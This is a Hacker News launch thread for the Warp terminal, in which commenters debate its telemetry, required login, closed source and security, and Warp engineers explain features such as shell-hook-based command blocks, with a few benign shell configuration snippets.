Show HN: Warp, a Rust-based terminal (warp.dev)
946 points by zachlloyd on April 5, 2022 | 726 comments
Hi HN community,

I’m Zach, founder and CEO of Warp, and am excited to show you Warp, a fast Rust-based terminal that’s easy to use and built for teams. As of today, Warp is in public beta and any Mac user can download it. It works with bash, zsh, and fish.

The terminal’s teletype-like interface has made it hard for the CLI to thrive. After 20 years of programming, I still find it hard to copy a command’s output; I always forget how to use `tar`; and I always have to relearn how to move my cursor. To fix fundamental accessibility issues, I believe we need to start innovating on the terminal, and keep pushing further into the world of shells, ultimately ending up with a better integrated experience.

At Warp we are building a Rust-based terminal that keeps what’s best about the CLI while modernizing the experience. We’ve built

1) An input area that works just like a code editor: selections, cursor positioning, and completion menus

2) Grouped commands and outputs, so you can easily copy, search, and share terminal outputs

3) AI-powered Command Generation and Community-sourced Workflows [0], so you can find useful commands without leaving the terminal

4) The ability to share your outputs with teammates: no more pasting long unformatted code into Slack

5) Project Workflows: save your team’s common commands into your project so your teammates can run them from Warp

See a demo here: [1]

We built Warp in Rust with GPU-accelerated graphics, and along the way we built our own UI framework, a text editor that’s a CRDT, and an out-of-the-box theming system. You can learn more here [2]. Huge thanks to our early collaborators: Atom co-founder Nathan Sobo, Nushell co-founder Andres Robalino, and Fish shell lead developer Peter Ammon.

We are planning to first open-source our Rust UI framework, and then parts and potentially all of our client. As of now, the community has already been contributing new themes [3]. And we’ve just opened a repository for the community to contribute common useful commands. [4]

Our business model is to make the terminal so useful for individuals that their companies will want to pay for the team features. We will never sell your data.

We are calling today’s release a “beta” because we know there are still some issues to smooth out. You will notice that a log-in is required and that we do collect usage data and crash reports. We do so to enable team features and also to keep improving the product. Post-beta, we will allow users to opt out of usage data. You can see our privacy policy here [5].

While it is a “beta”, we are confident that even today the experience is meaningfully better than in other terminals. If you use a Mac, please give it a shot at warp.dev and let us know how it goes. Otherwise, sign up here [6] to be notified when Warp is ready for your platform.

Join our community on Discord [7] and follow us on Twitter [8]

Let me know what you think! Ask me anything!

[0] https://docs.warp.dev/features/workflows
[1] https://youtu.be/X0LzWAVlOC0
[2] https://blog.warp.dev/how-warp-works/
[3] https://github.com/warpdotdev/themes
[4] https://github.com/warpdotdev/workflows
[5] https://warp.dev/privacy
[6] https://github.com/warpdotdev/warp/issues/120 and https://github.com/warpdotdev/Warp/issues/204
[7] warp.dev/discord
[8] twitter.com/warpdotdev




There are some legitimate concerns about Warp throughout these comments (telemetry, business model, etc.).

But the one thing that really excites me is to have a full team working full-time on building the terminal that developers want to use. They're doing real user research, talking to developers, and taking feedback in forums like HN seriously - and using up millions of VC-dollars building a new version of this fundamentally important core utility. I'd much rather have that VC money go toward an attempt at a better terminal than some ML or web3 startup.

I think this doesn't usually happen? All the terminal emulators I've used are open-source projects developed in someone's free time. Don't get me wrong, projects like Alacritty, urxvt, xterm, Terminator etc. are amazing for the funding they have (I think mostly $0?), but I'm super excited to see what a cohesive terminal based on real UX research can look like.


> using up millions of VC-dollars building a new version of this fundamentally important core utility

It's nice to think of this as 'taking advantage of' VC dollars, but VC dollars come with strings attached, namely the need for an 'exit'. The exit only happens if the company in question makes multiples of what it invested, meaning that VC-funded companies need significant revenue from their users. These days, the growth required for an exit leads to: 1) advertising being laced into a product, 2) user data being sold or otherwise monetized, or 3) charging you a monthly subscription fee.

Maybe this time it's different—there are theoretically other VC-friendly business models that work for software—but I struggle to see how.

Open-sourcing the application from the beginning would certainly give more confidence here.


I'm already wary of creating accounts on VC-funded apps, and surely there are others like me. I'm just tired of being burned by the cycle you just described: eventually value must be extracted, and that usually means trading user values against budget values. I'm not here for that anymore.


Thanks kyeb. I agree with both points here - we need to be very careful and sensitive in terms of how we build this product from a privacy and security perspective, but we see the opportunity mostly the same way you do.

There are some great open source terminals out there, but having the opportunity to rethink it with a team of dedicated full-time engineers I think gives us an opportunity to build something really powerful and useful.


Not to mince words, but so far you've made a very basic series of unforced errors on both privacy and security. This is perhaps to be expected, as glancing at your About page, you don't seem to have any security or privacy specialists on staff. I don't even see a security page or contact info.

Warp is starting to read like a Product-driven startup. The kind where people figure security and privacy are little features you can just throw in at the end of the dev cycle and advertise until then. It's not like anybody is going to actually check or care, right?

It's an understandable error in a visionary. Yet it's not the kind of mindset that produces trustworthy, secure, privacy-respecting enterprise products that companies happily pay lots for.

You're absolutely right. Warp needs to be very careful and sensitive about privacy and security. It may be worth reflecting on why you haven't been so far.


There is a lot of constructive value in this comment; I hope it is internalized and thought about.


For sure - one of my main takeaways from our ShowHN is that there's a ton of reasonable concern around login, telemetry, and open source that we need to address. We are going to come back to HN as we do that.

The HN community has a different default perspective than I have on a lot of these issues, but it's a perspective that matters to a ton of developers.


The specific concerns identified here can be thought of as symptoms. I invite you to contemplate what cause they might share. Addressing specific issues around telemetry, openness, and logins without fixing the underlying organizational concerns will leave you playing whack-a-mole forever.

Since you get our collective concerns, I look forward to seeing how you address the organizational issues here.


Yeah I think some folks are seeing this and thinking the terminal is the product, when in reality the devops platform is the real product here and a slick terminal emulator is one component of that platform. Enterprises pay good money to companies like Redhat, Teleport, etc. for similar kinds of devops collaboration/security platforms.


where's the devops platform?

if all they have to offer us is the terminal, then their product is the terminal


it's a good question. today warp is a terminal, as you say. the hope is that we can build a platform around the command line, but we decided to start with the terminal's fundamental UX to see if we could improve it. to build a platform, we believe we first need a great product that folks want to use.


Everyone is offering "platforms" these days. It's getting really tired and I can't be bothered to pay attention. Tools are where it's at, not platforms.


Warp wants to john deere-ify our tools. Soon you won't be able to buy a hammer or table saw without some sort of platform marketing speak and a subscription service.


Spirit Airlines of the Command Line.


If you want to use a terminal that is actually open source, has no telemetry, and doesn't require signing in with GitHub, use Alacritty, which is also written in Rust and is cross-platform.

https://github.com/alacritty/alacritty


Or alternatively wezterm, also open source, without telemetry, in Rust, and cross platform.

https://github.com/wez/wezterm


Wezterm is the best of the bunch I've tried, but I just keep going back to MATE terminal.


I use Konsole. It's written in I-dont-know-and-dont-give-a-shit-why-is-that-even-relevant.

It's free, does not spy on me, comes by default with Kubuntu and has great themes out of the box (including the Solarized themes).


> It's written in I-dont-know-and-dont-give-a-shit-why-is-that-even-relevant.

Same. But boy do people really like tools "written in Rust".


If you knew you could double your upvotes and praise by including that phrase, why wouldn't you? I mainly write Go these days, but when I submit my next tool to HN I'm just going to name it YadaYada Pro Written In Rust and retire on all the resulting upvotes. It's a foolproof plan and don't you dare judge me for it.


C++ mostly ;)


First of all, we love Alacritty: our terminal model code is based on Alacritty’s model code. We’re grateful that a few of the collaborators reviewed our early design docs.

We think the two products are meant for two different audiences.

Alacritty has a very minimalist philosophy that suits some terminal power users very well. It’s geared towards folks who are familiar with more advanced tools like tmux, and who are comfortable doing advanced configuration in the shell. For instance, Alacritty has no tabs: users are expected to use tmux.

With Warp, you get similar performance to Alacritty (we are both Rust-based, GPU-accelerated native apps, and Warp leverages some of Alacritty’s model code). But you also get many more built-in features that we think make all developers more productive, like:

- Blocks (grouping commands and outputs together)

- A modern text editor for your input

- Features like Workflows and AI command search that help you perform tasks faster

- Tabs, native split panes, and menus


I use alacritty every day, it’s the best terminal emulator I’ve come across.

That said, it’s not perfect. For example it lacks font ligature support, and there appears to be no prospect of that being implemented. I don’t care about ligatures that much anyway, so no big deal for me, but for others it is.

My experience using terminal emulators is that they are all flawed in at least one way. Whether it’s lack of true colour support; lack of ligature support; weird text rendering; weird colours; confusing configuration; etc. I feel like a terminal supporting all of those things must be possible, but I haven’t come across it yet.


Kitty has the features you're looking for, such as font ligature support. On Windows, I just use Microsoft Terminal.


Or Kitty, which does more or less the same things but includes split and tabs and other convenience features.


Kitty is cool, I use it on debian, but it is not cross-platform. So I hesitate to compare it to alacritty.


Oh hell, you are right! I’m only using linux and OSX now, and it works on both, so I’d never considered it might not work on windows.


It is a little bit unfortunate that Alacritty is licensed under Apache, which means it can be forked into proprietary software like this. If it were GPL like Kitty, the authors would have had no choice but to make it fully open source from the start.


Actually, the ability to re-license has more to do with who owns the copyright than it has with what the license is. A problem with a lot of GPL and AGPL software is that the copyright holder is a single corporate entity that insists on a copyright transfer for every OSS contribution. Often the whole point of using the GPL or AGPL license by these companies is that they are so restrictive that their customers have an incentive to buy a commercial license.

Nothing wrong with that of course and a valid business model. But it can become a problem when they choose to switch license or withdraw their product from the OSS market entirely (like Elastic did this last year). OSS where the individual contributors retain their copyright are much more robust. For example, Linux will never change license. It would be a legal nightmare to do that. They'd be chasing tens of thousands of copyright owners for their permission, or in some cases their surviving relatives. Every single one of them would have the power to say no. It would probably be cheaper to build a completely new OS kernel from scratch than to do that. Some companies that take issue with the license conditions actually are doing that. It's probably a big reason why Google is working on Fuchsia for example.

A lot of Apache software has distributed copyright ownership. Particularly everything hosted by the Apache Foundation. Nothing wrong with that license. Great software. Has existed for decades, will continue to exist for centuries.


They would not have used alacritty in that case.


Well, it doesn't look like they will be giving back. They will open source some things yes, but it doesn't look like it will go back into alacritty.


Which means it effectively makes no difference (for Alacritty) whether they use it or not.


Or just use xterm. It's blazing fast and even supports GPU acceleration if you are using a video driver that uses Xorg's GLAMOR acceleration framework. It has close to the lowest latency of any X terminal, as well. It has a reputation for being slow because it actually commits each character or terminal command to the display, you know, like a real terminal would. If you set the fastScroll X resource to true, xterm will behave like other terminal emulators and enable a speed hack that makes it skip display updates.
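For reference, the fastScroll resource mentioned above can be set from the shell. This is a sketch assuming the conventional ~/.Xresources location; adjust the path if you load X resources from elsewhere:

```shell
# Enable xterm's fastScroll speed hack via an X resource
echo 'XTerm*fastScroll: true' >> ~/.Xresources

# Reload resources if xrdb is available (requires a running X server)
command -v xrdb >/dev/null && xrdb -merge ~/.Xresources || true
```

New xterm windows started after the reload will pick up the setting.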



This is perhaps slightly orthogonal to the main discussion here on this thread, but I have a question for Zach (and the various engineers posting on this thread):

Did you guys talk to real-world users while building this and before this launch?

This whole blow-up re: your telemetry / open sourcey'ness seems like it could have been avoided. I'm curious if you actually floated these ideas with real world users and a) everyone else is cool with it but the HN crowd is super put off by it, b) everyone is super put off by it but you decided to launch anyway, or c) you didn't actually check with real-world users and hoped for the best.

Sorry if that sounds snarky - it's not my intent. I'm genuinely curious here as a product person / entrepreneur / builder, etc.


There's an active Discord with 700+ Warp users. I reported issues on it and immediately got helpful replies. They're talking to lots of real-world users.

My take is that the hacker news crowd is not the target market for Warp. I think it does an amazing job of making the terminal easy and friendly to infrequent users. I'd recommend it to anyone who tells me they prefer a git GUI interface over the shell because of how confusing the shell is. (this is where Warp's completions really shine)

But if you're already very comfortable in the shell and have a customized setup, there are some very rough parts of Warp. The lack of any compatibility with existing bash/zsh completions is the huge deal breaker for me.

Also you'd be surprised at the number of software engineers that really don't care how many sentry logging calls their apps make. I completely agree with the sentiment, and I personally just disable the Warp application's internet access to address this, but it's worth recognizing that we're in the minority of people that care.


> Also you'd be surprised at the number of software engineers that really don't care how many sentry logging calls their apps make. I completely agree with the sentiment, and I personally just disable the Warp application's internet access to address this, but it's worth recognizing that we're in the minority of people that care.

I'm in this boat. I never understood why I should care if some website interacts with google apis or logs everything I do and sells it to marketers so they can sell me ads. I'll block them anyway so it'll never make a difference to me one way or the other.


how do you block them in an app like warp ?


See my other comment for what I use, TripMode, but a DNS block on *.sentry.io would block the sentry calls. I tried setting a proxy to see Warp's other network activity but only the sentry.io calls actually respect the system-wide proxy settings. Pretty annoying, though it's probably not intentional. Just takes a little more work to inspect its traffic.

Other DNS lookups it triggers:

   api.segment.io                
   app.warp.dev                  
   identitytoolkit.googleapis.com
   o540343.ingest.sentry.io      
   securetoken.googleapis.com    
   storage.googleapis.com
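If you don't want a dedicated firewall app, a blunt alternative is null-routing hostnames in /etc/hosts. A sketch: the hosts file can't express a *.sentry.io wildcard, so each observed subdomain has to be listed explicitly, and blocking app.warp.dev or the googleapis.com identity hosts would presumably break login too:

```shell
# Generate /etc/hosts lines that null-route the given hostnames.
# Review the output, then append it yourself, e.g.:
#   block_hosts api.segment.io o540343.ingest.sentry.io | sudo tee -a /etc/hosts
block_hosts() {
  for host in "$@"; do
    printf '0.0.0.0 %s\n' "$host"
  done
}

block_hosts api.segment.io o540343.ingest.sentry.io
```

This only covers plain DNS lookups; an app that hardcodes IPs or uses DNS-over-HTTPS would sail right past it.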


> I personally just disable the Warp application's internet access to address this

How do you do that? I used to use Little Snitch, but not sure if it's still the best these days.


oops, I already replied to losvedir directly, but for everyone else on macOS I recommend TripMode: https://tripmode.ch/

It's far, far simpler than Little Snitch. Its intended purpose is managing low-data connections, but I leave it on all the time and use it as a per-app network permission manager. The data usage tracking is also nice. By default all new apps lack network access. It takes a little bit of work to manage, and sometimes you get unexpected issues, but it's well worth it. It's amazing seeing all the network activity trying to come from apps that really don't need the network at all. Like a terminal... (though for a deeper analysis I'll bust out Charles proxy with TLS interception)


Warp engineer here - thanks for writing about your experience!

As cieplik mentioned, it's true that telemetry has not been mentioned as frequently as it has been on HN.

> I think it does an amazing job of making the terminal easy and friendly to infrequent users.

As for our users, it's a combination of newer and more experienced terminal users. More than half of them are self-reported advanced or expert terminal users.


It's cool seeing Warp folks so active on here!

Some more thoughts: I've tried it a bunch, and my big issue with Warp is it just throws away a bunch of the more obscure/advanced shell features and pretends like they were never there. The sheer inelegance of it just pains me. Like if Warp wants to destroy my custom zsh keybindings, ok, but at least tell zsh that so they don't appear when I run `bindkey` to list them. Or at least pass along the key events to the shell when a shortcut is pressed that Warp doesn't already know about. Right now it just eats my custom bindings and does nothing with them.

My fzf history searching is also thrown away, along with my keybinding to kill a line AND put it in the system pasteboard. (That's an awesome feature that Warp should just do.) The other big one for me is completions. It's hard for me to imagine an expert terminal user who has never written their own completions, or who, having written them, is happy throwing them away.
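For context, the kill-line-and-copy behavior mentioned above takes only a few lines of zsh config. A hypothetical ~/.zshrc sketch for macOS (it relies on zsh's zle widgets and pbcopy), not anything from Warp itself:

```shell
# Hypothetical zle widget: kill the whole line and also place the
# killed text on the macOS pasteboard via pbcopy
kill-line-to-pasteboard() {
  zle kill-whole-line
  print -rn -- "$CUTBUFFER" | pbcopy
}
zle -N kill-line-to-pasteboard
bindkey '^K' kill-line-to-pasteboard  # rebind Ctrl-K to the new widget
```

This is exactly the kind of customization a terminal that intercepts key events can silently break.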

I really like the idea of someone re-imagining the shell+terminal, but Warp is occupying this awkward middle ground between a terminal emulator and a shell. I wish it would either be a new shell with an integrated GUI interface, or be a terminal emulator that actually lets the shell do everything it knows how to do.


It's got 700 upvotes atm but not HN's audience? Okay...


This is a great answer. Thank you!


Hey - in general, yes, we do talk to our users regularly about the product (in fact, I first participated in a research session, and only after that decided to join the company).

I assume you're asking specifically about discussing telemetry and open source, not only the features. We try to be super open about collecting the data, and we published an extensive list of the things we report. Most of our users don't mind. Those who did messaged us directly about it and shared their feedback. Some even decided to trust us after exchanging emails, talking to the team, and seeing us improve the messaging based on their feedback.

Regarding open source: it is not just a vague promise. We do have plans to do it; many team members joined the company because they want to contribute to the community. We actively discuss this topic with our community on Discord and GitHub. I'm personally super excited about our UI framework, and can't wait until we open it up to other people (we recently added some a11y support, which is super cool and not as common among Rust frameworks). Here's the GitHub discussion for more context: https://github.com/warpdotdev/Warp/discussions/400

However, we understand that our current mode of operation won't (and honestly, can't) please everyone, so it's not surprising that there are people who don't agree with this approach.


Why did you not just make telemetry and logins opt-in? That avoids the entire issue from day one.

I think that's what is giving people a strange feeling about this. You prioritized your own desires (not needs mind you) rather than your users. And if your thinking is so off that you really think these are needs during the beta then that is even more worrying.

If I were in your shoes I'd crunch immediately to make telemetry, crash reporting, and logging in three separate opt-in features then get a build out ASAP. Prompt people to enable or disable each with clear language in a single screen (no EULAs or lawyer weasel words) and no dark patterns (like double-negative checkboxes or flipping cancel and accept button colors).

For crash reports and logins there is an even better way to handle this that is respectful of your users without being obtrusive and shows you are working hard to earn trust. Then you only need one post-install prompt to ask permission to share data which is much simpler.

1. Ask the user each time you find a crash report and let them inspect it if they want to do so, then ONLY send the content the user inspected (no hidden payloads, extra HTTP headers, etc). Include a checkbox/dropdown "Always send" or "Never send". The default is to ask the user to help you out. It gives transparency by letting them inspect the entire payload. And if/when you've earned their trust they will click Always on their own. It also covers you just in case the payload accidentally picks up something sensitive.

2. When the user invokes a feature that actually needs a login then prompt them at that time. Or if the context doesn't allow that, show an unobtrusive icon, link, or banner in a context-appropriate way that lets them create an account or login.

3. For sharing let users share things anonymously with links, no account required. Once they've started using the feature let them know they can create an account to "claim" the things they've shared. This can be a good way to show people the benefits rather than just claiming benefits exist. It makes a nice on-ramp without pestering or annoying people who never create an account. And the people they share things with may end up becoming your users.


> Why did you not just make telemetry and logins opt-in?

While I'm not them, I can answer this. Users did ask for this as much as they asked for other things.

> You prioritized your own desires (not needs mind you) rather than your users.

That's an awfully big assumption to make, and one that does not conform to reality.


Will Warp be licensed under a FOSS license (any of those approved by the OSI or FSF) after being open-sourced?


Thank you for answering! So it really just sounds like an impedance mismatch between Warp and the HN crowd.


> Some even decided to trust us

You could also be that special someone to trust us. Let's trust each other.


Is it possible that this is blowing up only on HN and the privacy thing is not regarded as so important in other communities?


Don't know. I downloaded the image, installed it, and was greeted by a mandatory login. The next step was to uninstall and delete the dmg. What a waste of time.


That’s my option (a) above. I too am curious!


We spoke with a lot of users (someone mentioned our discord which has thousands of members) and there are thousands of developers using Warp every day (prior to this ShowHN).

We also were expecting some of this response from the HN community, and understand it.

The short answer to your question is that different developers care about different things. A lot of developers are OK with login, telemetry etc (we are not the only tool that has these things), and they exist in our case because it helps us produce a better product experience.

That said, I don't want to dismiss your question - we needed to do a better job understanding the perspective of more developers, and the response on HN has made that very clear. We are going to take the feedback and adjust course.

Thank you!


What is there to talk about? Anything to be discussed about telemetry as a general concept has been discussed in other products at some point. I personally think the paranoia toward telemetry is just ideological; I doubt people can articulate exactly how telemetry is detrimental to them.

I would not blame companies for adding telemetry to improve their product (instead of tracking users), and for not explicitly telling the paranoid mob about it, as if to give them an excuse not to use the product. It's not like they won't find out anyway.


> I doubt people can articulate exactly how telemetry is detrimental to them.

It’s not hard to articulate. Here’s Der Spiegel’s 2013 reporting on the NSA’s use of Windows telemetry for passive observation of targets:

> The automated crash reports are a "neat way" to gain "passive access" to a machine, … [this] provides valuable insights into problems with a targeted person's computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim's computer.

> In one internal graphic, [the NSA] replaced the text of Microsoft's original error message with one of their own reading, "This information may be intercepted by a foreign sigint system to gather detailed information and better exploit your machine."


This is neat, but I'm not convinced it's going in the right direction.

It's not open source, and "maybe it will eventually be" is unacceptable for such a core component of an engineer's workflow. Most of the features on the front page are "coming soon," not actually available. There's no timeline for support for non-Mac OS systems, and it's built using Metal rather than any cross-platform API, so it will be at least moderately difficult to port. (Isn't the whole point collaboration?) It is "blazingly-fast" but has no benchmarks for latency or startup time.

The team raised money because "[b]uilding a terminal is hard," and the business model seems reasonable - build a terminal people like, and then get businesses to pay for it - but I'm hard-pressed to find a use case that would benefit from the upsides of this tool which isn't also utterly hamstrung by its shortcomings, at least currently.

Yeah, maybe you can justify it at an all-Mac dev shop, but at the last all-Mac place I worked we did everything this currently does with iTerm (free) and Tuple, and frankly I don't see this obviating the need for Tuple in that use case. (EDIT: Tuple also works fine on Linux, and of course there are myriad excellent terminals for Linux.)

Perhaps most importantly, though, this FAQ entry concerns me:

> Every session you work on your desktop can be backed by a secure web permalink. It opens into a browser tab that shows your terminal state and allows readers to scroll and interact with the read-only elements. You might use this for yourself: so you can view and run commands on it while you're away from your machine. Or you might share it with a coworker for debugging.

First of all, is this actually available at the moment? I think not, since "Web (WASM)" is still on the roadmap.

Second, "secure" is doing a lot of work here. What's the threat model Warp considers themselves secure against? How are these sessions allocated? Does every terminal start in a connected state, or is the connection only made once the user opts in? Are the terminal sessions E2EE? Are they exposed to Warp's internal systems? If so, what is stopping any attacker who makes it into Warp's network from remotely monitoring and controlling user machines? If Warp says it _is_ E2EE or otherwise secured in this manner, how can we trust them when it's not open source?

This seems too risky to be worth using seriously, and perhaps too risky to even try out.


Yeah, I just got an invite code yesterday, but given this I may opt against using it - this seems like a real risk for leaking env vars, credentials...I don't so much mind stuff like Segment and Sentry, but I'd love to see some details from someone familiar with the project around the same questions you raised regarding the web-integrated functionality.


Thousands of developers use JetBrains' IntelliJ IDEA, WebStorm, and GoLand. Only the Community Edition of IntelliJ IDEA is open source.

Software doesn't need to be open source to be adopted if the vendor has the right security practices, and I'm sure that for enterprise contracts they will have the right level of information available under NDA once they hit GA.


Enterprise contracts also include clauses spelling out the financial consequences of major screwups. If JetBrains screws up and a customer's passwords go everywhere, I'd bet the contract makes JetBrains at least a bit liable.

I doubt Warp offers a clause like that.


You're comparing a 10+ year old company with a company that has a product in beta. I don't think this is a valid comparison. I'm sure they'll provide enterprise level contracts and support for large installation at some point.


Yes, I am. You're absolutely right. I'm doing so in order to illustrate what it is about mature closed-source enterprise software offerings that makes them acceptable to use.

Otherwise it amounts to using a random binary blob and hoping it does what you want it to. Without any ability to check its internals yourself (short of RE) or any legal backing.

Some might opine that that's completely reasonable, but I think many might find it an unreasonable risk for an enterprise to take. Regardless of how new the vendor may be.

Again, you're completely right about the comparison I am making. I hope I've been able to clarify my reasons.


Great callouts. I definitely get your concern around block sharing. That feature does exist currently in Warp, but it is completely opt-in on a per-command basis (we never collect any command output without the user opting in first). The way this works is that if you explicitly click "Share" by right-clicking on a block, we will send the contents to our server and generate a link for you. A block can also be unshared at any point to completely delete it from our server.

Regarding the cross-platform piece, the plan is absolutely to support different platforms. In fact we've built our own cross-platform UI framework to help us with this endeavor which you can read about here: https://www.warp.dev/blog/how-warp-works. We chose Metal to start because the Metal debugging tools in Xcode are excellent, allowing us to inspect texture resources and easily measure important metrics like frame rate and GPU memory size. Thankfully, because our graphics code is decoupled from our UI framework, porting the graphics piece of the UI framework essentially amounts to porting over a few hundred lines of shader code, which shouldn't be too difficult.


What is Tuple?

Edit: After searching for variations of “terminal” “iterm” and “tuple”, of course it’s the top hit if you just search Mac and tuple! https://tuple.app/


>It's not open source, and "maybe it will eventually be" is unacceptable for such a core component of an engineer's workflow.

That's a huge overstatement. What's unacceptable about it (or any other software for that matter) closed-source?


> What's unacceptable about it (or any other software for that matter) closed-source?

Lots of things. Lock-in, for one. Warp's VCs decide they want an exit and Warp becomes a $50/month SaaS, or some sanctions block you from using Warp. Your whole workflow, scripts, etc. are basically dead. Also, what is in that closed source? No one can audit it, and it's literally the environment that contains all of your secrets.


Like others here, I'm leery of replacing my terminal with a VC-backed, maybe open-sourced eventually product, and a bit annoyed it claimed a name already in use in the Rust world.

But...it is exciting to see someone reimagining the terminal a bit. People frequently talk about wanting a better GUI interaction model for everyone, but the actual ideas to improve it seem to be missing, I think because the desktop status quo is really not that bad for low-learning curve systems. (In fact, I think many of the changes in the name of desktop/mobile convergence have been for the worse.) I'm way more interested in the idea of creating a hybrid text/graphic command interface for programmers. There's a much better interface waiting for someone with the vision and (more importantly) ability to create an ecosystem around it. Some ideas:

* Warp's more visual completion is super welcome. Does it work with the shell's standard completion scripts?

* Warp's blocks look like a nice step in the right direction. How do they work? I'd guess it's ANSI codes like iTerm uses to distinguish the ends of commands, although that has the downside that a broken/hostile command can impersonate the shell saying the command has ended. It'd be nice to work out some compatible yet more robust protocol. (Maybe the shell takes responsibility for piping subcommand's output through it and filtering, or maybe something else.)
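For reference, the iTerm-style convention the parent guesses at does exist: the FinalTerm "semantic prompt" escapes (OSC 133), which shell-integration scripts emit around each command. A rough sketch of the conventional marks:

```shell
# FinalTerm/iTerm2-style semantic prompt marks (OSC 133). A shell
# integration hook emits these so the terminal can delimit commands:
printf '\033]133;A\007'          # about to draw the prompt
printf '\033]133;B\007'          # prompt done, user input begins
printf '\033]133;C\007'          # command launched, output begins
printf '\033]133;D;%d\007' "$?"  # command finished, with its exit status
```

Since any program that can write to the tty can emit these marks, this convention has exactly the impersonation weakness described above.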

* It'd be interesting to further extend blocks with some protocol that allows programs to output within their block using richer elements: non-monotype fonts, adjustable tables, etc. A little like a Jupyter notebook, maybe. Even better if it works with some richer way for programs to pipe information to each other.

* Likewise, when launching alternate-screen terminal stuff, to allow them to do more with the rectangle than a grid of text. Closer to embedding an arbitrary cross-platform network-transparent GUI, launched from the shell, occupying its rectangle.

* And at first glance, looks like it's missing tmux-like features (whether integration with tmux proper like iTerm has or its own thing). I'd want that in any richer terminal app—most of my work in terminals is on remote machines, often over flaky network connections.


I'm working on a terminal browser of sorts that is designed to browse terminal user interfaces served by servers. The idea is that no mouse input is supported and servers specify keyStrokes for links. It starts from a protobuf specification optimized for sending components over gRPC in a pageRequest/pageResponse manner.

In order to promote the idea I've been spending most of the time writing a client in Go. I think it has enough functionality that I can start writing servers that really showcase the capabilities.


This sounds like ssh apps via https://charm.sh


Yes. Thanks for this. This is very very similar to what I'm trying to do. I guess more like the subproject https://github.com/charmbracelet/wish than anything.

I suppose the difference is that I like the idea of being able to link to other servers and keep a contextual menu bar telling the user where they are. Also, in corporate environments SSH is often locked down because of what it could potentially do. This would be nice as it would be sandboxed to only what the client/server are coded to do.

Thanks for the link, this gives me some things to think about.


FWIW, I think ssh apps or something similar could be a very powerful paradigm for people who live in the terminal and a diversity of ideas here would be welcome.


Warp engineer here. Really appreciate your ideas here!

> Warp's more visual completion is super welcome. Does it work with the shell's standard completion scripts?

It does not. But we have completions out of the box for 200 commands.

Warp's input is a text editor instead of the shell's input. This means we ended up building completions by hand, and soon via the community. We think this is a better experience because we can provide more inline documentation.

> Warp's blocks look like a nice step in the right direction. How do they work?

tl;dr: shell hooks

Most shells provide hooks for before the prompt is rendered (zsh calls this precmd) and before a command is executed (preexec). Using these hooks, we send a custom Device Control String (DCS) from the running session to Warp. Our DCS contains an encoded JSON string that includes metadata about the session that we want to render. Within Warp we can parse the DCS, deserialize the JSON, and create a new block within our data model.
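A minimal sketch of that mechanism, with an illustrative payload (the hook wiring is standard zsh; the function name and JSON fields below are made up, not Warp's actual format):

```shell
# Illustrative zsh-style hooks emitting a DCS with JSON metadata.
# DCS framing: ESC P <payload> ESC \
__emit_block_dcs() {
  local json
  # Hypothetical metadata: event name, working directory, exit status.
  json=$(printf '{"event":"%s","pwd":"%s","exit_code":%d}' "$1" "$PWD" "${2:-0}")
  printf '\033P%s\033\\' "$json"
}

precmd()  { __emit_block_dcs precmd "$?"; }  # runs before each prompt
preexec() { __emit_block_dcs preexec; }      # runs before each command
```

The terminal side then scans the pty stream for the DCS, deserializes the JSON, and opens or closes a block in its data model.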

Re: impersonation: that's a good concern we will consider.

> It'd be interesting to further extend blocks with some protocol that allows programs to output within their block using richer elements.

Absolutely! This is definitely on the roadmap. We want rich output like adjustable tables and images. We also want to support a protocol so other CLI programs can use it.

> Likewise, when launching alternate-screen terminal stuff, to allow them to do more with the rectangle than a grid of text.

Yes we are thinking of supporting blocks within tmux, for example.

> And at first glance, looks like it's missing tmux-like features (whether integration with tmux proper like iTerm has or its own thing).

Yes, other than split panes, we do not have tmux-like features. We've begun mocking out what those features could look like. We are thinking of a native window management solution and a native way of saving workspace/session templates.

We are also thinking of what a deeper integration with Tmux might look like.


> This means we ended up building completions by hand and soon, via the community.

You like people to contribute for free ("build a community") but refuse to give them an actual FOSS client. This is bound to fail.

There are ways to make this go both ways though, and I hope you'll make them work once you are a bit further along in your journey. Exciting project!


Meh, I could be into it without them providing a FOSS implementation. Think of Microsoft's language server protocol. It's nice that VS Code is open source, but even if it weren't, we might still be using this protocol with rust-analyzer and neovim. Or any number of older protocols/formats with RFCs that didn't start with good FOSS implementations.

In the case of completion, if you can generate (less rich but still useful) bash/zsh/fish completion scripts from these files, program authors might be happy to use it even in the absence of a fancy terminal.
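To make that concrete, here is what a spec-derived, "less rich" bash completion might look like for a hypothetical tool `mytool` (the tool name and word list are invented for illustration):

```shell
# Sketch of a generated bash completion for a hypothetical "mytool",
# lowered from a richer spec to a plain word list (no inline docs).
_mytool() {
  local cur=${COMP_WORDS[COMP_CWORD]}
  # compgen filters the candidate list down to words matching $cur.
  COMPREPLY=( $(compgen -W "build test deploy --help --version" -- "$cur") )
}
complete -F _mytool mytool
```

The richer spec could additionally carry per-option documentation, which a plain `compgen` word list cannot express.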


There exist multiple fully functional FOSS LSP clients. The semi-proprietary nature of VS Code does not doom LSP.

The documentation people would contribute to Warp, though, is unlikely to have any popular FOSS clients.


> You like people to contribute for free ("build a community") but refuse to give them an actual FOSS client. This is bound to fail.

Sublime text has a pretty active community that builds and shares extensions.

Why not warp?


Sublime is selling a product that users can purchase and own

Warp is owned by venture capitalists


How about we don’t downvote the developers when they take time to answer questions?

I don’t care if it wasn’t the answer you were hoping for; this should be upvoted, as it is very relevant to the conversation in this thread.


I'm wondering if the solution for block separation could be to have a separate tty (or pty?) for each block. I guess that wouldn't work too well with existing shells, though.


That might be interesting for supporting multiple blocks running at once without confusion, as an update to the classic shell job control. Highlighting stdout vs stderr differently, too.

Another dimension to consider is the possibility of nested blocks: subshells, ssh, programs with their own REPL, etc.


That's how I thought it worked at first: that each block's pty executed its own shell instance, passing the environment and current working directory between them. Perhaps that would be a very naive approach that couldn't work in practice.


Wanted to give it a shot but got disappointed when I launched it and the following happened:

- Outgoing request to googleapis.com

- Outgoing request to segment.io

- Outgoing request to sentry.io

- Requires sign up (only via Github, mind you)

I understand the first request is probably to fetch some dynamic configuration, even though I'd rather my terminal ship with static configuration. But then you have Segment and Sentry: I'm not interested in sending telemetry from my terminal. Finally, having user accounts for a terminal is such a strange concept.

I really wanted to like it, too. The screenshots look great


Also: security?

I expect my terminal to be a much more secure environment than my web browser. When an application starts communicating with the internet, I have no choice but to treat it with the same level of scrutiny as my browser.

Even making telemetry opt-in means that it has the capability to send information to the internet that I don’t know about, which means that I have to treat it like an application that can do that.

